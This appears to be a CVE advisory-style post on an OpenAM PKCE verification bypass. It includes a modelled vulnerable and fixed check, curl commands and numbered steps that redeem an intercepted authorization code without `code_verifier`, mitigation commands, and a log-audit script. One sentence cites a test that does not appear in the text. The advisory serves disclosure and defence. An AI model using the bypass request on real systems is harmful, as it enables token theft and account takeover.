How the CVE Works
The vulnerability resides in OpenAM’s OAuth2 authorization-code grant implementation, specifically in how PKCE (Proof Key for Code Exchange) protection is enforced. PKCE, defined in RFC 7636, is designed to protect authorization codes from interception attacks by requiring the client to provide a `code_verifier` that matches the `code_challenge` sent during the authorization request.
During the authorize endpoint flow, OpenAM correctly stores the `code_challenge` on the issued authorization code. However, the token endpoint’s verification logic contains a critical flaw: it only requires the `code_verifier` parameter when the realm-wide `codeVerifierEnforced` setting is enabled. This setting ships disabled by default in OpenAM Community Edition through version 16.0.6.
When `codeVerifierEnforced` is disabled, the token endpoint checks the stored challenge only if the caller supplies a `code_verifier`. If the attacker simply omits the `code_verifier` parameter entirely, the PKCE verification is skipped and the authorization code is redeemed without any proof of possession. This is an Improper Authorization vulnerability (CWE-285).
An attacker who intercepts an authorization code (e.g., through a man-in-the-middle attack or by sniffing network traffic) can exchange it for access tokens and refresh tokens without knowing the original `code_verifier`. The bypass is specifically the missing-parameter path — supplying an incorrect verifier is still rejected, but omitting it bypasses the check entirely.
The vulnerability affects OpenAM Community Edition through version 16.0.6 and was patched in version 16.1.1.
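To make the described check concrete, here is an added model (not OpenAM's code) of the token endpoint's PKCE decision: `redeem_vulnerable` follows the advisory's description of the flawed logic, where a missing `code_verifier` is tolerated whenever the realm-wide `codeVerifierEnforced` setting is off, and `redeem_fixed` shows the hardened rule that a challenge bound to the code always demands a matching verifier. The `AuthCode` class and function names are assumptions for illustration; the S256 transform follows RFC 7636.

```python
import base64
import hashlib
import secrets
from dataclasses import dataclass
from typing import Optional


def s256_challenge(verifier: str) -> str:
    """RFC 7636 S256: BASE64URL(SHA256(ASCII(code_verifier))) with padding stripped."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


@dataclass
class AuthCode:
    """What the authorize endpoint records on an issued code (a model, not OpenAM's data structure)."""
    code_challenge: Optional[str]          # None if the client sent no PKCE challenge
    code_challenge_method: str = "S256"


def verifier_matches(code: AuthCode, verifier: str) -> bool:
    """Compare the presented verifier against the stored challenge in constant time."""
    expected = verifier if code.code_challenge_method == "plain" else s256_challenge(verifier)
    return secrets.compare_digest(expected, code.code_challenge)


def redeem_vulnerable(code: AuthCode, verifier: Optional[str], enforced: bool) -> bool:
    """Token-endpoint check as the advisory describes it for OpenAM <= 16.0.6 (modelled)."""
    if verifier is None:
        # The verifier is only demanded by the realm-wide codeVerifierEnforced setting;
        # with it off (the default) a missing parameter skips PKCE entirely, even though
        # a code_challenge was bound to this code.
        return not enforced
    return code.code_challenge is not None and verifier_matches(code, verifier)


def redeem_fixed(code: AuthCode, verifier: Optional[str], enforced: bool) -> bool:
    """Hardened check: a challenge bound to the code always requires a matching verifier."""
    if code.code_challenge is not None:
        return verifier is not None and verifier_matches(code, verifier)
    # No PKCE on this code at all: only the realm-wide setting can still demand one.
    return not enforced
```

The verifier/challenge pair used in the test is the worked example from RFC 7636 Appendix B.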
DailyCVE Form:
Platform: OpenAM Community Edition
Version: 16.0.6 and earlier
Vulnerability: PKCE verification bypass
Severity: Medium (CVSS: 5.3)
Date: 2026-06-29
Prediction: 2026-07-15 (estimated)
What Undercode Say:
```bash
# Check current OpenAM version
curl -s http://openam-host:8080/openam/version | jq '.version'

# Test PKCE bypass (authorization code interception scenario)
# Step 1: Intercept authorization code from /oauth2/authorize response
AUTH_CODE="intercepted_auth_code_12345"

# Step 2: Attempt token exchange WITHOUT code_verifier (bypass)
curl -X POST http://openam-host:8080/openam/oauth2/access_token \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "grant_type=authorization_code" \
  -d "code=$AUTH_CODE" \
  -d "client_id=public_client" \
  -d "redirect_uri=https://client.example.com/callback"
# If vulnerable, this returns access_token without code_verifier

# Step 3: Verify realm configuration (requires admin access)
curl -s http://openam-host:8080/openam/json/realms/root/oauth2 \
  -H "Cookie: iPlanetDirectoryPro=$ADMIN_TOKEN" | jq '.codeVerifierEnforced'
# Returns "false" if vulnerable
```
Exploit:
1. Intercept an OAuth2 authorization code from the `/oauth2/authorize` endpoint response (e.g., via network sniffing or man-in-the-middle).
2. Extract the `code` parameter from the callback URL.
3. Send a POST request to `/oauth2/access_token` with:
– `grant_type=authorization_code`
– `code=
– `client_id=
– `redirect_uri=
– Omit the `code_verifier` parameter entirely
4. The token endpoint accepts the request and returns `access_token` and `refresh_token` without validating PKCE.
5. The attacker can now use the tokens to access protected resources on behalf of the victim.
Protection:
- Update to OpenAM Community Edition version 16.1.1 or later.
- Enable the `codeVerifierEnforced` setting at the realm level:

```bash
curl -X PUT http://openam-host:8080/openam/json/realms/root/oauth2 \
  -H "Content-Type: application/json" \
  -H "Cookie: iPlanetDirectoryPro=$ADMIN_TOKEN" \
  -d '{"codeVerifierEnforced": true}'
```

- Monitor OAuth2 token endpoints for requests missing `code_verifier` (potential exploitation attempts).
- Rotate client secrets and consider migrating to confidential clients where client authentication provides an additional layer of protection.
- Implement additional logging and alerting for anomalous token exchange patterns.
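The monitoring recommendation above can be implemented as a simple audit over token-endpoint request logs. The following is an added example, not part of the advisory or of OpenAM: it parses constructed log lines (the line layout and field names are assumptions) and flags authorization-code redemptions that carry no `code_verifier`, the exact path this bypass uses, plus verifiers outside the RFC 7636 length bounds.

```python
from urllib.parse import parse_qs

# Constructed sample entries, not real OpenAM audit logs: one token-endpoint request per line,
# with the form body appended after "body=".
SAMPLE_LOG = """\
2026-06-29T10:00:01Z POST /openam/oauth2/access_token ip=10.0.0.5 body=grant_type=authorization_code&code=c1&client_id=public_client&code_verifier=dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk
2026-06-29T10:00:02Z POST /openam/oauth2/access_token ip=10.0.0.9 body=grant_type=authorization_code&code=c2&client_id=public_client
2026-06-29T10:00:03Z POST /openam/oauth2/access_token ip=10.0.0.9 body=grant_type=refresh_token&refresh_token=r1&client_id=public_client
2026-06-29T10:00:04Z POST /openam/oauth2/access_token ip=10.0.0.7 body=grant_type=authorization_code&code=c3&client_id=public_client&code_verifier=tooshort
"""

TOKEN_PATH = "/openam/oauth2/access_token"


def parse_entry(line: str):
    """Split a constructed log line into (timestamp, ip, parsed form parameters), or None."""
    head, _, body = line.partition(" body=")
    fields = head.split()
    if len(fields) < 4 or fields[2] != TOKEN_PATH:
        return None
    params = {k: v[0] for k, v in parse_qs(body).items()}
    return fields[0], fields[3].removeprefix("ip="), params


def audit_token_requests(log_text: str) -> list:
    """Return (timestamp, ip, reason) for authorization-code redemptions lacking a sound verifier."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_entry(line)
        if entry is None:
            continue
        ts, ip, params = entry
        if params.get("grant_type") != "authorization_code":
            continue
        verifier = params.get("code_verifier")
        if verifier is None:
            # The bypass path: redemption with no proof of possession at all. Correlate with the
            # /oauth2/authorize request that carried a code_challenge to confirm PKCE was expected.
            findings.append((ts, ip, "authorization_code grant without code_verifier"))
        elif not 43 <= len(verifier) <= 128:
            # RFC 7636 section 4.1 bounds the verifier length; anything else is malformed.
            findings.append((ts, ip, f"code_verifier of invalid length {len(verifier)}"))
    return findings
```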
Impact:
- Confidentiality: An attacker can access the victim's protected resources by obtaining valid OAuth2 tokens.
- Integrity: An attacker can perform actions on behalf of the victim within the scope of the stolen tokens.
- Availability: Not directly impacted, but token theft can lead to account compromise and subsequent denial of service.
- Affected Deployments: OpenAM Community Edition through version 16.0.6 with OAuth2 Provider service enabled and `codeVerifierEnforced` set to `false` (default).
- Attack Vector: Network-based interception of authorization codes or compromise of the authorization code transmission channel.
- Prerequisites: Attacker must intercept a valid authorization code; for confidential clients, attacker also needs client authentication credentials.
Sources:
Reported By: github.com